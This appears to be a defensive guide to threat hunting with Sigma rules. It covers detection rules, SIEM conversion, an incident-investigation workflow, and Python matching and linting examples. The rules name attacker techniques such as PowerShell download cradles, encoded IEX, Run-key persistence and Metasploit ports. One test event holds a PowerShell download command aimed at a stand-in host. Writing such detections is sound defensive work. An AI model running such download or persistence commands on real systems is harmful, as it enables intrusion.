# Threat Hunting with Sigma Rules

## When to Use This Skill

- Investigating security incidents
- Creating detection rules for SIEM
- Analyzing suspicious activity patterns
- Building threat detection pipelines
- Converting detections between platforms
## Sigma Rule Basics

### Rule Structure

```yaml
title: Suspicious PowerShell Download
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
status: experimental
description: Detects PowerShell commands downloading files from the internet
author: Security Team
date: 2024/01/15
modified: 2024/01/20
logsource:
  category: process_creation
  product: windows
detection:
  selection_process:
    Image|endswith: '\powershell.exe'
  selection_commands:
    CommandLine|contains|all:
      - 'Net.WebClient'
      - 'DownloadString'
  condition: selection_process and selection_commands
falsepositives:
  - Legitimate administrative scripts
  - Software installers
level: medium
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1140
```
### Field Modifiers

| Modifier | Description | Example |
|---|---|---|
| `contains` | Substring match | `CommandLine\|contains: 'wget'` |
| `startswith` | Prefix match | `Image\|startswith: 'C:\Temp'` |
| `endswith` | Suffix match | `Image\|endswith: '.exe'` |
| `re` | Regex match | `CommandLine\|re: '.*base64.*'` |
| `all` | All values must match | `\|contains\|all:` |
| `base64` | Base64 decode first | `CommandLine\|base64\|contains:` |
| `cidr` | IP range match | `DestinationIp\|cidr: '10.0.0.0/8'` |
## Common Detection Patterns

### Process Creation

```yaml
title: Suspicious Process from Temp Directory
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|contains:
      - '\Temp\'
      - '\AppData\Local\Temp\'
    Image|endswith:
      - '.exe'
      - '.com'
      - '.scr'
  filter_known:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
  condition: selection and not filter_known
```
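To make the matching semantics of the rule structure above and the temp-directory rule concrete, here is an added example (my code, not the page's and not pySigma): a minimal evaluator for the modifiers these rules use (`endswith`, `contains`, `contains|all`) and for conditions of the form `A and B` / `A and not B`, run over the two rules' `detection` sections transcribed as dicts and a few constructed process_creation events. It assumes plain Sigma string matching is case-insensitive, and a selection that names a field absent from the event does not match.

```python
def match_value(mods, actual, pattern):
    # One event value against one rule value; plain Sigma string matching is case-insensitive
    actual, pattern = str(actual).lower(), str(pattern).lower()
    if "contains" in mods:
        return pattern in actual
    if "startswith" in mods:
        return actual.startswith(pattern)
    if "endswith" in mods:
        return actual.endswith(pattern)
    return actual == pattern

def match_selection(selection, event):
    # Every field in a selection must hold (AND); a list of values is OR unless |all is set
    for spec, values in selection.items():
        field, *mods = spec.split("|")
        if field not in event:  # an absent field never matches
            return False
        values = values if isinstance(values, list) else [values]
        hits = [match_value(mods, event[field], v) for v in values]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def evaluate(detection, event):
    # Conditions of the shape used on this page: selection names joined by 'and', optionally 'not'
    result, negate = True, False
    for tok in detection["condition"].split():
        if tok in ("and", "not"):  # 'and' is implicit between terms; 'not' flips the next term
            negate = negate or tok == "not"
            continue
        result = result and (match_selection(detection[tok], event) != negate)
        negate = False
    return result

# The detection sections of two rules from this page, transcribed as Python dicts
POWERSHELL_DOWNLOAD = {
    "selection_process": {"Image|endswith": "\\powershell.exe"},
    "selection_commands": {"CommandLine|contains|all": ["Net.WebClient", "DownloadString"]},
    "condition": "selection_process and selection_commands"}
TEMP_PROCESS = {
    "selection": {"Image|contains": ["\\Temp\\", "\\AppData\\Local\\Temp\\"],
                  "Image|endswith": [".exe", ".com", ".scr"]},
    "filter_known": {"Image|endswith": ["\\setup.exe", "\\installer.exe"]},
    "condition": "selection and not filter_known"}
EVENTS = [  # constructed process_creation events, not real telemetry
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -c (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe", "CommandLine": "update.exe /s"},
    {"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe", "CommandLine": "setup.exe"}]
```

Event 0 fires only the PowerShell rule, event 1 only the temp-directory rule, and event 2 is suppressed by `filter_known` even though `selection` matches it.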
### Network Connections

```yaml
title: Outbound Connection to Known Malicious Port
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationPort:
      - 4444  # Metasploit
      - 5555  # Common RAT
      - 6666  # IRC
      - 8080  # Web proxy
  condition: selection
```
### File Creation

```yaml
title: Executable Created in Suspicious Location
logsource:
  category: file_event
  product: windows
detection:
  selection:
    EventType: 'creation'
    TargetFilename|endswith:
      - '.exe'
      - '.dll'
      - '.ps1'
    TargetFilename|contains:
      - '\Windows\Temp\'
      - '\ProgramData\'
      - '\Users\Public\'
  condition: selection
```
### Registry Modifications

```yaml
title: Run Key Persistence
logsource:
  category: registry_event
  product: windows
detection:
  selection:
    EventType: SetValue
    TargetObject|contains:
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
  condition: selection
```
## Hunting Queries

### PowerShell Hunting

```yaml
# Encoded PowerShell Commands
title: Encoded PowerShell Execution
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - '-e '
    CommandLine|base64offset|contains:
      - 'IEX'
      - 'Invoke-Expression'
  condition: selection
```
### Lateral Movement

```yaml
# PsExec-like Activity
title: Remote Service Installation
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 7045  # Service installed
    ServiceFileName|contains:
      - '\ADMIN$\'
      - '\C$\'
  condition: selection
```

### Data Exfiltration

```yaml
# Large Outbound Transfers
title: Large Data Transfer to External IP
logsource:
  category: proxy
detection:
  selection:
    bytes_out|gt: 10000000  # 10MB
  filter_internal:
    dst_ip|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_internal
```
## MITRE ATT&CK Mapping

```yaml
tags:
  # Initial Access
  - attack.initial_access
  - attack.t1566          # Phishing
  # Execution
  - attack.execution
  - attack.t1059.001      # PowerShell
  - attack.t1059.003      # Windows Command Shell
  # Persistence
  - attack.persistence
  - attack.t1547.001      # Registry Run Keys
  # Defense Evasion
  - attack.defense_evasion
  - attack.t1140          # Deobfuscate/Decode
  # Credential Access
  - attack.credential_access
  - attack.t1003          # OS Credential Dumping
  # Lateral Movement
  - attack.lateral_movement
  - attack.t1021.002      # SMB/Windows Admin Shares
```
## Converting Sigma Rules

### To Splunk

```bash
# Using sigmac (legacy)
sigmac -t splunk -c sysmon rule.yml

# Using sigma-cli
sigma convert -t splunk -p sysmon rule.yml
```

### To Elastic

```bash
sigma convert -t elasticsearch -p ecs-windows rule.yml
```

### To Microsoft Sentinel

```bash
sigma convert -t microsoft365defender rule.yml
```
## Investigation Workflow

### 1. Triage Alert

```markdown
## Alert Triage Checklist
- [ ] Verify the detection fired correctly
- [ ] Check for false positive indicators
- [ ] Identify affected systems
- [ ] Determine timeline of activity
- [ ] Assess potential impact
```

### 2. Gather Context

```splunk
# Related process activity
index=windows EventCode=1
| where host="affected_host"
| where _time >= relative_time(now(), "-1h")
| stats count by Image, CommandLine, ParentImage
| sort -count

# Network connections from host
index=network src_ip="10.1.1.50"
| where _time >= relative_time(now(), "-1h")
| stats count by dest_ip, dest_port
| sort -count
```

### 3. Timeline Analysis

```markdown
| Time  | Event            | Source       | Details                  |
|-------|------------------|--------------|--------------------------|
| 10:00 | Phishing email   | Email logs   | malicious.doc attached   |
| 10:05 | Document opened  | Process logs | WINWORD.EXE spawned      |
| 10:06 | PowerShell       | Process logs | Encoded command          |
| 10:07 | Network conn     | Firewall     | C2 callback to 1.2.3.4   |
| 10:10 | New service      | Event logs   | Persistence installed    |
```

### 4. Containment

```bash
# Isolate affected system
# Block IOCs at firewall
# Disable compromised accounts
# Preserve evidence
```
## Rule Testing

```python
# Test Sigma rule with pySigma
# pip install pysigma pysigma-backend-splunk
from sigma.rule import SigmaRule
from sigma.backends.splunk import SplunkBackend

# YAML inside the string must keep its indentation or the rule will not parse
rule = SigmaRule.from_yaml("""
title: Test Rule
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\\cmd.exe'
    condition: selection
""")

backend = SplunkBackend()
# convert_rule returns a list with one query string per rule
print(backend.convert_rule(rule))
```
## Best Practices

- Test rules against known-good baseline
- Include false positive documentation
- Map to MITRE ATT&CK techniques
- Version control all rules
- Regular rule review and tuning
- Document investigation runbooks
- Share rules with community (when appropriate)
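A rule linter is the usual way to enforce the rule structure from the Basics section and the first three best practices in a version-controlled rule repository. The following is an added example (my code, not the Sigma project's validator and not pySigma); it checks a parsed rule dict for the required top-level fields, a UUID `id`, known `status` and `level` values, condition names that resolve to defined selections, documented false positives and well-formed `attack.*` tags. The sample is the page's first rule transcribed as a dict; the accepted `status` and `level` sets and the tag pattern are my assumptions about the Sigma specification.

```python
import re
import uuid
from fnmatch import fnmatch

ATTACK_TAG = re.compile(r"^attack\.(t\d{4}(\.\d{3})?|[a-z_]+)$")  # attack.t1059.001 or attack.execution
REQUIRED = ("title", "id", "status", "description", "logsource", "detection", "level")
STATUSES = {"stable", "test", "experimental", "deprecated", "unsupported"}  # assumed from the Sigma spec
LEVELS = {"informational", "low", "medium", "high", "critical"}
KEYWORDS = {"and", "or", "not", "of", "them", "all"}  # condition grammar words, not selection names

def lint_rule(rule):
    """Return findings for one parsed Sigma rule (a dict); an empty list means it passes."""
    findings = [f"missing required field '{k}'" for k in REQUIRED if k not in rule]
    try:
        uuid.UUID(str(rule.get("id", "")))
    except ValueError:
        findings.append("id is not a UUID")
    if rule.get("status") not in STATUSES:
        findings.append(f"unknown status '{rule.get('status')}'")
    if rule.get("level") not in LEVELS:
        findings.append(f"unknown level '{rule.get('level')}'")
    detection = rule.get("detection", {})
    condition = str(detection.get("condition", ""))
    if not condition:
        findings.append("detection has no condition")
    for name in set(re.findall(r"[a-z_][a-z0-9_*]*", condition)) - KEYWORDS:
        if not any(fnmatch(k, name) for k in detection if k != "condition"):  # wildcards like sel_* allowed
            findings.append(f"condition references undefined selection '{name}'")
    if not rule.get("falsepositives"):
        findings.append("no falsepositives documented")
    tags = [str(t) for t in rule.get("tags", [])]
    bad = [t for t in tags if not ATTACK_TAG.match(t)]
    if bad:
        findings.append(f"malformed ATT&CK tags: {bad}")
    if not any(t.startswith("attack.t") for t in tags):
        findings.append("no ATT&CK technique tag")
    return findings

RULE = {  # the first rule on this page, as it would parse from YAML
    "title": "Suspicious PowerShell Download", "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7",
    "status": "experimental", "description": "Detects PowerShell commands downloading files from the internet",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {"selection_process": {"Image|endswith": "\\powershell.exe"},
                  "selection_commands": {"CommandLine|contains|all": ["Net.WebClient", "DownloadString"]},
                  "condition": "selection_process and selection_commands"},
    "falsepositives": ["Legitimate administrative scripts", "Software installers"], "level": "medium",
    "tags": ["attack.execution", "attack.t1059.001", "attack.defense_evasion", "attack.t1140"]}
BAD_RULE = {**RULE, "id": "not-a-uuid", "falsepositives": [], "tags": ["attack.execution", "T1059.001"]}  # constructed
```

Run `lint_rule` over every rule file in CI (after loading it with a YAML parser) and fail the build on a non-empty result.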